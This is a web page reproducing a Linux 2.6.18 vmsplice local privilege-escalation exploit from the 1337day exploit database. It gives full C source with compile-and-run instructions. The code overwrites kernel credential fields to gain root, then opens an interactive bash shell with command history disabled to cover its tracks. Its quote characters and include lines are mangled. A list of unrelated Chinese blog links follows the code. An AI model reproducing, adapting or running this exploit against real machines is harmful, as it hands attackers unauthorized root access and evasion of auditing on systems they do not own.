/*
*
*
* 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
* 0 _ __ __ __ 1
* 1 /” \ __ /”__`\ /\ \__ /”__`\ 0
* 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
* 1 \/_/\ \ /” _ `\ \/\ \/_/_\_<_ /''___\ \ \/\ \ \ \ \/\`''__\ 0
* 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
* 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
* 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
* 1 \ \____/ >> Exploit database separated by exploit 0
* 0 \/___/ type (local, remote, DoS, etc.) 1
* 1 0
* 0 2.6.18 Modified By CrosS 1
* 1 0
* 0 Linux 2011 1
* 1 0
* -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
*
* Linux 2.6.18 Previously Coded by “Angel Injection” , couple of thanks for this, but
*
* it had errors while compiling, so this is modified version of this exploit
*
* working fine . Usage is given below..
*
* gcc -o exploit exploit.c
* chmod 777 exploit
* ./exploit
*
* Greetz: r0073r( 1337day.com ),r4dc0re,side^effects and all members of
1337day Team ) ….. & all members of r00tw0rm.com ( RW ) .. )
*
* Submit Your Exploit at Submit@1337day.com | mr.inj3ct0r@gmail.com
*
* For Educational purpose Only))
*/
#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include

#include
#include
#include
#include
#include
#define __KERNEL__
#include

#define PIPE_BUFFERS 16
#define PG_compound 14
#define uint unsigned int
#define static_inline static inline __attribute__((always_inline))
#define STACK(x) (x + sizeof(x) – 40)

struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct { long next, prev; } lru;
};

void exit_code();
char exit_stack[1024 * 1024];

void die(char *msg, int err)
{
printf(err ? “[-] %s: %s\n” : “[-] %s\n”, msg, strerror(err));
fflush(stdout);
fflush(stderr);
exit(1);
}

#if defined (__i386__)

#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif

#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246

static_inline
void exit_kernel()
{
__asm__ __volatile__ (
“movl %0, 0x10(%%esp) ;”
“movl %1, 0x0c(%%esp) ;”
“movl %2, 0x08(%%esp) ;”
“movl %3, 0x04(%%esp) ;”
“movl %4, 0x00(%%esp) ;”
“iret”
: : “i” (USER_SS), “r” (STACK(exit_stack)), “i” (USER_FL),
“i” (USER_CS), “r” (exit_code)
);
}

static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
“movl %%esp, %%eax ;”
“andl %1, %%eax ;”
“movl (%%eax), %0″
: “=r” (curr)
: “i” (~8191)
);
return (void *) curr;
}

#elif defined (__x86_64__)

#ifndef __NR_vmsplice
#define __NR_vmsplice 278
#endif

#define USER_CS 0x23
#define USER_SS 0x2b
#define USER_FL 0x246

static_inline
void exit_kernel()
{
__asm__ __volatile__ (
“swapgs ;”
“movq %0, 0x20(%%rsp) ;”
“movq %1, 0x18(%%rsp) ;”
“movq %2, 0x10(%%rsp) ;”
“movq %3, 0x08(%%rsp) ;”
“movq %4, 0x00(%%rsp) ;”
“iretq”
: : “i” (USER_SS), “r” (STACK(exit_stack)), “i” (USER_FL),
“i” (USER_CS), “r” (exit_code)
);
}

static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
“movq %%gs:(0), %0″
: “=r” (curr)
);
return (void *) curr;
}

#else
#error “unsupported arch”
#endif

#if defined (_syscall4)
#define __NR__vmsplice __NR_vmsplice
_syscall4(
long, _vmsplice,
int, fd,
struct iovec *, iov,
unsigned long, nr_segs,
unsigned int, flags)

#else
#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif

static uint uid, gid;

void kernel_code()
{
int i;
uint *p = get_current();

for (i = 0; i < 1024-13; i++) {
if (p[0] == uid && p[1] == uid &&
p[2] == uid && p[3] == uid &&
p[4] == gid && p[5] == gid &&
p[6] == gid && p[7] == gid) {
p[0] = p[1] = p[2] = p[3] = 0;
p[4] = p[5] = p[6] = p[7] = 0;
p = (uint *) ((char *)(p + 8) + sizeof(void *));
p[0] = p[1] = p[2] = ~0;
break;
}
p++;
}

exit_kernel();
}

void exit_code()
{
if (getuid() != 0)
die("wtf", 0);

printf("[+] root\n");
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", NULL);
die("/bin/bash", errno);
}

int main(int argc, char *argv[])
{
int pi[2];
size_t map_size;
char * map_addr;
struct iovec iov;
struct page * pages[5];

uid = getuid();
gid = getgid();
setresuid(uid, uid, uid);
setresgid(gid, gid, gid);

if (!uid || !gid)
die("!@#$", 0);

/*****/
pages[1] = pages[0] + 1;

map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);

memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[0]);
printf("[+] page: 0x%lx\n", pages[1]);

pages[0]->flags = 1 << PG_compound;
pages[0]->private = (unsigned long) pages[0];
pages[0]->count = 1;
pages[1]->lru.next = (long) kernel_code;

/*****/
pages[2] = *(void **) pages[0];
pages[3] = pages[2] + 1;

map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die(“mmap”, errno);

memset(map_addr, 0, map_size);
printf(“[+] mmap: 0x%lx .. 0x%lx\n”, map_addr, map_addr + map_size);
printf(“[+] page: 0x%lx\n”, pages[2]);
printf(“[+] page: 0x%lx\n”, pages[3]);

pages[2]->flags = 1 << PG_compound;
pages[2]->private = (unsigned long) pages[2];
pages[2]->count = 1;
pages[3]->lru.next = (long) kernel_code;

/*****/
map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die(“mmap”, errno);
memset(map_addr, 0, map_size);
printf(“[+] mmap: 0x%lx .. 0x%lx\n”, map_addr, map_addr + map_size);
printf(“[+] page: 0x%lx\n”, pages[4]);

/*****/
map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die(“mmap”, errno);

memset(map_addr, 0, map_size);
printf(“[+] mmap: 0x%lx .. 0x%lx\n”, map_addr, map_addr + map_size);

/*****/
if (pipe(pi) < 0) die("pipe", errno);
close(pi[0]);

iov.iov_base = map_addr;
iov.iov_len = ULONG_MAX;

signal(SIGPIPE, exit_code);
_vmsplice(pi[1], &iov, 1, 0);
die("vmsplice", errno);
return 0;
}

LINUX 2.6.18-238 local root exp的更多相关文章

  1. 监控Linux性能的18个命令行工具

    监控 Linux 性能的 18 个命令行工具 对于系统和网络管理员来说每天监控和调试Linux系统的性能问题是一项繁重的工作.在IT领域作为一名Linux系统的管理员工作5年后,我逐渐 认识到监控和保 ...

  2. karottc A Simple linux-virus Analysis、Linux Kernel <= 2.6.37 - Local Privilege Escalation、CVE-2010-4258、CVE-2010-3849、CVE-2010-3850

    catalog . 程序功能概述 . 感染文件 . 前置知识 . 获取ROOT权限: Linux Kernel <= - Local Privilege Escalation 1. 程序功能概述 ...

  3. Linux树莓派中/etc/rc.local不执行的问题

    最近研究在树莓派中嵌入式开发java程序,并打算和Salesforce进行通信.需要开发一个java的web server,不想弄那么复杂,于是打算在linux系统中/etc/rc.local写想要执 ...

  4. 解决C3P0在Linux下Failed to get local InetAddress for VMID问题

    解决C3P0在Linux下Failed to get local InetAddress for VMID问题 FailedtogetlocalInetAddressforVMID.Thisisunl ...

  5. Linux开机启动文件rc.local无法执行怎么办?

    rc.local是Linux系统中的一个重要的开机启动文件,每次开机都要执行这个文件.但是有一些用户的Linux系统无法执行这个文件,并导致了一系列的问题.遇到这个问题我们应该怎么办呢? 在Linux ...

  6. Linux(Unix)密码策略问题导致root密码不能修改

    Linux(Unix)密码策略问题导致root密码不能修改 发布时间:  2016-01-19 浏览次数:  1034 下载次数:  5 用户修改了密码配置文件,导致root账户修改密码时报如下错误: ...

  7. Linux下配置Nginx(在root的/etc/rc.local里配置开机启动功能http://tengine.taobao.org/)

    上面是下载的包下载地址 http://tengine.taobao.org/download_cn.html nginx官网http://nginx.org/ 下一步 下一步 其中remote为重要属 ...

  8. [轉]Linux kernel <2.6.29 exit_notify() local root exploit分析(2009-1337)

    author : deep_pro目前网上的这个exploit(http://www.milw0rm.com/exploits/8369)的分析是有些问题的(http://forum.evilocta ...

  9. Linux kernel perf_swevent_init Local root Exploit

    64位上编译 另外修改了原Exploit的一个错误 第76行 把     uint64_t *p = (void *) ¤t[i]; 改成       uint64_t *p = (void *) & ...

随机推荐

  1. 2.11 2D平面最近点对问题[closest pair problem]

    [本文链接] http://www.cnblogs.com/hellogiser/p/closest-pair-problem.html [题目] 给定平面上N个点的坐标,找出距离最近的两个点之间的距 ...

  2. 如何给spine骨骼动画挂载粒子特效

    目的是要把粒子挂载到骨骼动画的某个一个部件上,其实最主要是找对位置. 预览效果,左手红火,右手蓝火,很炫吧:) //init bool HelloWorld::init() { /////////// ...

  3. WordPress前台后台页面打开慢的解决方法

    写个人网站用WordPress程序是一个不错的选择,但是目前安装之后速度很慢,后台配置页面半天打不开,在网上查了一下原来是Google被墙导致,WordPress默认模板会加载谷歌的open-sans ...

  4. (原创)Python字符串系列(1)——str对象

    在本博客 <Python字符串系列> 中,将介绍以下内容: Python内置的str对象及操作 字符串的格式化 Python中的正则表达式 re模块 本文将介绍Python内置的 str ...

  5. August 6th, 2016, Week 32nd, Saturday

    It is not the mountain we conquer, but ourselvess. 我们征服的不是高山,而是我们自己. Difficulties and obstacles, jus ...

  6. oracle 10g 学习之多表查询、分组函数(6)

    笛卡尔集 l  笛卡尔集会在下面条件下产生: 省略连接条件 连接条件无效 所有表中的所有行互相连接 l  为了避免笛卡尔集, 可以在 WHERE 加入有效的连接条件. 自连接 select m.las ...

  7. Mongodb安装(Mac平台)

    1安装: sudo brew install mongodb 2 启动MongoDb sudo mongod —config /usr/local/etc/mongod.conf 3.登录mongo ...

  8. LBS优化方案探究

    方案1: 假设数据结构是这个样子的结构 那么找某个范围之内的用户,相当于: select * from tb_lbs_user where lat > lat_min and lat < ...

  9. H.264 基础及 RTP 封包详解

    转自:http://my.oschina.net/u/1431835/blog/393315 一. h264基础概念 1.NAL.Slice与frame意思及相互关系 1 frame的数据可以分为多个 ...

  10. 兼容古董级IE小结

    IE6已经死亡,当然7,8,9,10也挂掉了.微软对IE11更下了狠手,对其停止了更新.以为前端就可以安安心心地写代码了.可是就是有些顽固分子,竟然用的还是IE6,尊崇客户至上的原则,就恶心着给他兼容 ...